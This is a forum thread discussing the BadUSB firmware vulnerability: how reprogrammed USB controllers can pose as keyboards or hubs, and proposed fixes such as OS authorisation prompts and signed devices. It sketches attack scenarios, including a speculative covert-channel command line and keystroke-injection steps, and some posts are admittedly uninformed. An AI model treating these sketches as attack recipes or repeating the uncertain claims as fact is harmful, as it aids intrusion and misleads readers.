The USB standards board has a unique opportunity in front of them: the upcoming Type C plugs — which, as I understand it, can replace the Type A sockets on the computers themselves.
The standards board could coincide the release of the new plugs with a “repaired” standard (call it v3.2 or even USB4) for the communication bus. This would break some backward compatibility on old computers, but the new plugs wouldn't exactly fit in them without assistance either. (Perhaps C->A adaptors could include bridges that, while themselves prone to the vulnerability, would provide a compatibility layer.)
It would be a rough pill to swallow, but the inevitable disruption of both changes to the standard (new plugs, and a backward-compatibility-breaking security update) would be condensed to one event, and consumers would be able to easily identify safe USB devices. That's a huge win.
How would you actually fix it? Ban HID devices from being plugged into a USB hub at all? Because outside of that I haven't heard of any proposals, and that is frankly unworkable given the how many devices are designed with a single USB port under the assumption that you can HUB-in more.
An OS level policy is what I think would be best. Notify the user, "Did you just insert a USB keyboard?", and wait for their approval to enable the HID.
This can be worked upon, e.g., automatically allowing the first keyboard and pointer devices, or allowing all devices if the user feels lucky etc.
One large problem I see, that can be be rectified by perhaps only the USB standard-setters, is whitelisting. Currently, the best handle are the idVendor and idProduct properties, but a BadUSB can easily spoof those too. Cryptographic signatures for identification is what I'm thinking would be best.
Many devices have internal hubs as well. My notebook chains one external USB interface through two nested internal hubs (the deepest of which also controls the mouse and keyboard) before it even gets to the physical port, the other USB port goes through yet another hub. There's three total hubs in the system before even plugging in anything external. A rule like this would kill all of my existing HID devices except for my webcam, which is the only device on directly connected to the USB host.
Fits with the coincidental marketing of "USB condoms" which now seem like an extra good idea where charging is the goal.
Makes me now wonder about the infection potential of a lot of USB powered devices. I could imagine a lot of "dumb" devices incidentally using a vulnerable controller chip, even if the application of USB is purely for power. Maybe most USB powered devices have a safe / invulnerable way of sipping power? Anyone faniliar with USB power-only devices want to comment?
USB stands for Universal Serial Bus. Almost every device (Keyboard, storage device, speakers, etc) can be attached over USB these days. Therefore your computer can't know what kind of device can attach over USB; it's left to the device itself to tell the computer what it is.
The big security problem that they found is that the computer has no way to verify that the usb device is actually the type of device that it proclaims to be. This opens up a massive security hole (as demonstrated at blackhat). A usb device can first tell the computer that it's a mass-storage device, and then later change itself to a keyboard and then start 'typing' commands as a user would. The computer can't see if it's a real keyboard or a fake keyboard, and that's the problem.
This is not a vulnerability in your OS but rather a gross oversight in the USB specification. This vulnerability is shown to be cross platform(linux,windows) and cross hardware(2 different usb chipsets). It's dubbed 'unpatchable' because to patch this we need a need new (safe) USB specification and you'd need to buy a new pc with those new usb ports.
short explanation: there's no security running along the USB bus. Not even bad security. Every device on the bus has "admin" privileges to the other devices, and that includes the ability to update the firmware.
A scenario…
• A mysterious USB key is plugged into a computer, Mission Impossible style.
• The key rewrites the firmware of another device on the USB bus, say the embedded keyboard.
• the keyboard "types": "run the file NOTAVIRUS.BIN on that totally trustworthy USB key you see mounted. oh, and I'll bruteforce any passwords you need if that's a problem."
You've seen dippy Hollywood movies where a spy plugs in a USB key, an LED lights up and he announces that the system is hacked? Really exactly like that.
* I am not an expert, this is how it was described to me by someone who is. It is believed that this is how the Iranian nuclear reactor was compromised by STUXNET.
While it is true that the USB bus offers no security, it is inaccurate to claim that every device has "admin" privileges with every other device. Most devices expose a limited interface to the bus which won't allow direct manipulation of their respective microcontrollers (e.g. no re-writing, no alteration, etc).
The reason why we're discussing Phison USB sticks is that they're an exception. When you plug in a device with a Phison microcontroller, other devices or the computer can alter the microcontroller and have it act maliciously.
A common proof of concept is to have the USB stick's microcontroller pretend to be other USB devices in order to escalate access. In this case they are emulating a fictional USB hub, a fictional USB keyboard, and the actual USB drive (which is routed through the fictional USB hub).
In order to send keystrokes they aren't altering another keyboard on the USB bus, they're generating them from the virtual keyboard they generated via software on the Phison microcontroller. There doesn't need to be a real keyboard on that same bus for this to work (e.g. you could plug in a USB stick directly to a computer and this would still show up as a USB Hub, USB Keyboard, and USB Thumb Drive).
Once you have a virtual keyboard you can send gems like this (assume Windows):
You don't even need to do that. The USB key can just announce to the computer "Hi I'm a USB hub. I have a keyboard and a USB flash drive plugged into me."
What stops the OS implementing something that says "until you prove you're a keyboard, you can't type anything"? Something like the authorisation screen for Bluetooth keyboards.
Connect usb stick. It does nothing on the first connect. Restart computer few hours later. The infected stick is disconnected. When it loads it detects that it was restarted or reinserted. It assumes restart so it decided to turn on keyboard emulation. System starts, detects two keyboards but does not know which one can be trusted. What do you do now?
Imagine the USB controller as being some kind of butler for the OS — though subservient, he has a mind of his own, which can be compromised. The OS/employer takes anything the butler says as factual.
"Your granddaughter Red Riding Hood is at the door, miss, and is definitely not a wolf."
OK, so what's stopping Granny saying "I want to check whether she's a wolf myself"?
I can see how the current state of affairs is insecure, but I'm confused by the 'unpatchable' claim. I truly am clueless in this area, but initially it seems hyperbolic to say that the only way to fix this is to replace all USB controllers in existence.
The OS can't look at the device until it's plugged in (obviously); the device plugs into the USB bus, which then gets compromised before the OS even knows anything is there.
To extend my (now hilariously) tortured analogy, granny is stuck in bed, she can't check if it's a wolf until the butler knows there's someone at the door. As soon as he sees the wolf, he is compromised. Maybe a vampire would have been a better metaphor?
[EDIT] actually I should dump the analogies altogether: this is a hardware vulnerability, not software. It hits the computer, the operating system is helpless. That’s why the problem, for existing computers, is not apparently fixable.
I suppose for keyboards you could do something like requiring a specific randomly generated password that is shown on the monitor to by typed by a keyboard before allowing it to provide regular keyboard input, but I'm not sure how practical that would be. I assume it would also have to happen each time the machine reboots, etc, since any USB device can pretend to be another.
That's just for USB keyboards though, there used to be these USB sticks that pretended to be a CD-rom drives in the windows xp days where those were autorun, I'm sure there's other vulnerabilities that can be exposed through USB nowadays.
Would a USB drive be able to 'know' what the ID of another USB device is? As I'm seeing the explanation:
1. User plugs in USB drive and keyboard.
2. USB drive obtains the ID of the keyboard.
3. Later, it looks when the keyboard is not plugged in and changes it's ID to that of the keyboard.
4. Now the computer thinks when the USB drive is an authorised keyboard, and can type whatever malicious commands it wants.
Is that right? Apart from keyboard, what other devices could it exploit?
I don't think there's a concept of a "hub" over Bluetooth. However, I don't see why a malicious speaker couldn't report itself as a keyboard. But then your speaker wouldn't work, so you'd know something was up.
No. Bluetooth is a totally different set of communication protocols. (this thread is noisy with misinformation as it is, you might want to delete your post).
Even better scenario: (but I'm not sure if possible)
Malware is downloaded from the net. It hijacks one of the usb HIDs. It than removes itself from the system and once every few hours sends something like lsusb | grep "ID: hackable" > /dev/emulated/and/spoofed/sound/card
when the data is received by the spoofed sound card, hacked HID turns on network emulation. It then sends commands to change routing so it could download needed, hacked firmware to a local disk. It infects the newly inserted, hackable device, and goes back to sleep.
My dad's a doctor: his bit of the NHS has never allowed USB devices anywhere near any computer on any of their sites. HIDs are whitelisted by device ID iirc, and physically secured.
I'm guessing somebody there looked at the spec back in the 90s and gave it two thumbs down.
Yep. You'd have to either know what was on the whitelist or do some kind of bruteforce. Wouldn't be very hard, although I think this stuff is logged centrally in organisations as data-paranoid as the NHS so some random box hotplugging thousands of different peripherals every minute would attract attention pretty quickly, you'd hope.
When I was (working) at the hospital most of the records were still on good old hard-to-steal paper. Still are IIRC, the governments plan to IT-ize it all was fucked up by the vendors in exactly the way you'd imagine.
Establishing the the provenance of USB devices is going to be hard. People are going to continue to use USB keys for the sneakernet. Infection rates are going to be high. This has the potential to be pretty impactful to everyday people in a way that, say, shellshock is mostly not.
I wonder how long it will take for someone to come up with an inline hardware dongle that tries to mitigate / block this.
I disagree. I think this is patchable to a reasonable degree. I don't mean that it would be 100% secure, of course.
All you need is a security layer requiring user authorization for execution of code from any USB device. In addition to this you could add a setting to lock in a single USB keyboard. In other words, make the Hollywood movie scenario nearly impossible.
OK, why did I say "nearly impossible"? Because a knowledgeable embedded engineer could very easily build a device that self-identifies to look exactly like your keyboard. Your computer would not know them different.
Faced with that, the security layer would have to add a re-authorization state upon disconnection of the authorized keyboard.
Now you are vulnerable to reboot or a clever parallel wiring attack. The latter is the case of someone building hardware that can be wired into your authorized keyboard after taking it apart. The reboot vector could be mitigated by simply requiring the entry of a password in order to enable any execution/console commands to be accepted from the keyboard. With this even a fully authorized keyboard would not have execution rights of a whole host of command line commands until re-authorized by the user.
None of this is perfect. I just thought it up in five minutes. Absolute security isn't achievable without the kinds of systems and controls in place at high security facilities. However, I think it is possible to create an easy to use software layer that can stop a hacker with casual access to a system in a corporate setting. All you have to do is slow them down enough to make it less palatable, much like a home alarm system.
>All you need is a security layer requiring user authorization for execution of code from any USB device.
That won't help. You can still send keystrokes to the system, which means that BadUSB could have a step by step process, including downloading, installing and compiling anything it needs.
I've got question to anyone that does firmware programming.
I suspect that it is possible to emulate USB device in software. If that's true, how hard would it be to create a virtual usb hub, that the system will treat just like a real usb hardware, and would it require any special privileges on the computer (i.e kernel space module, root).
If it's easy, then I'm worried that it may be possible use this to hide malware this way.
Interesting idea. It would almost certainly require access to the kernel, but you could create a fake USB device (or any other kind of device!) easily. But the fake driver would have to reside on disk where your anti-malware can see it.
The advantage of hiding things in USB keys' firmware is that it can't be seen by normal scanners.
Why aren't these things somehow cryptographically signed like a lot of software? Seems like it would fix the problem. You could always do what Windows/OsX does when a USB device isn't signed and prompt the user with something like "warning, this USB device is not from a trusted manufacturer, continue?"
Technical implementation of this idea is difficult to impossible, because the device controls what it sends to the host. This means the device could, as an extreme example, contain two firmware areas and a management controller / hypervisor. It could allow the valid firmware to enumerate with a valid signature and then swap over to malicious code undetected - a similar problem to Microsoft's flawed Xbox360 copy protection where the host trusts the DVD drive to authenticate discs.
Anyway, even provided someone could conceive a real implementation, there are still the same issues we've seen with signed OSes (Trusted Boot) and signed device drivers in Windows:
Who gets to be a root CA for peripheral software? How do small/homebrew manufacturers get approved? How does the CA verify the legitimacy of the people they're issuing certs to?
How do compromised certs get revoked?
What happens when the cert for a legitimate device gets stolen?
What if nobody wants to pay for a cert for their crappy fly-by-night flash drives, and users learn to "just click Install?"
That's a really cool idea but I suspect that this would be down to the inevitable problem of "cost". Getting the equivalent of an EV cert for some backwater country's crap mouse with a major brand stuck on the case would add cost to the device and shoot the margins for the distributor, the manufacturer and the retailer.
1) Getting a (legitimate) USB vendor ID is already a big barrier to entry for smaller players in the hardware business. The USB Forum is basically a cartel of people who aren't interested in selling you a product ID unless you want to buy 65,536 of them at once for thousands of dollars. Then there's the expensive kernel-mode code signing certificate that you'll have to buy in order to deploy your Windows driver. The world needs fewer crypto-cartels, not more.
2) It's always been accepted as a truism that once an attacker has physical access to your computer, the security game is over. Why is everyone rushing to discard this axiom all of a sudden? Don't people understand that this will lead to a world where your computer relies on third-party gatekeepers to treat you as a security threat?
This is interesting. At my job, a pretty big financial company, they automatically lock down USB ports on the company computers, but I think it is done on the OS (Windows) layer. Will that make a difference?
I'm not completely sure, but the vulnerability resides in the fact that an usb device can mimic any other type of device. However if all devices are ignored by the system then it won't matter what evil usb devile you insert: it will be ignored just like all the legitimate usb devices.
So yes, if your company blocks absolutely all usb devices than you're probably safe.
Yeah, I guess people do (I use a Mac, so I'm not subject to those regulations). I know that when you plug in a thumb/regular drive or phone, it tells you that an unlock code is needed
The HID masquerade attack seems fairly easy to thwart from the OS. My machines all have full disk encryption enabled. They won't boot unless you enter the password. So the OS shouldn't enable any keyboard that wasn't used to enter the password. If you plug in a keyboard later, simply screenlock. If the new keyboard correctly enters the password, enable it. Otherwise don't.
None of this prevents malware already on your system infecting your legitimate keyboard, but at least random memory sticks or other non-keyboards can't spoof keyboards.
I don't know about "the same way", but Andrew "bunnie" Huang had a cool talk and post about hacking the firmware of SD cards and had this to say about security:
> om the security perspective, our findings indicate that even though memory cards look inert, they run a body of code that can be modified to perform a class of MITM attacks that could be difficult to detect; there is no standard protocol or method to inspect and attest to the contents of the code running on the memory card’s microcontroller. Those in high-risk, high-sensitivity situations should assume that a “secure-erase” of a card is insufficient to guarantee the complete erasure of sensitive data. Therefore, it’s recommended to dispose of memory cards through total physical destruction (e.g., grind it up with a mortar and pestle).
So what, exactly, is this? Software (windows only?) to inject rubberducky/modify the firmware of regular Phison USB drives? Can this possibly be applied to other USB drives as well, or does this require entirely different firmware/patchers?
What does the hidden partition patch do?
This all seems extremely interesting (and scary), but I'm having a hard time understanding what exactly it is.
It sounds like someone figured out how to use the silicon vendors firmware flashing methodology. You would be amazed how trivial it is to get into most ICs out in the wild. (I have experience in custom IC development.) I'm sure that we will see many more hacks like this out in the wild as time goes on and general knowledge about how ICs with custom state machines + integrated processors really work.
And, of course, got a copy of the software either via reverse engineering or some other method of questionable legality.
The standards board could coincide the release of the new plugs with a “repaired” standard (call it v3.2 or even USB4) for the communication bus. This would break some backward compatibility on old computers, but the new plugs wouldn't exactly fit in them without assistance either. (Perhaps C->A adaptors could include bridges that, while themselves prone to the vulnerability, would provide a compatibility layer.)
It would be a rough pill to swallow, but the inevitable disruption of both changes to the standard (new plugs, and a backward-compatibility-breaking security update) would be condensed to one event, and consumers would be able to easily identify safe USB devices. That's a huge win.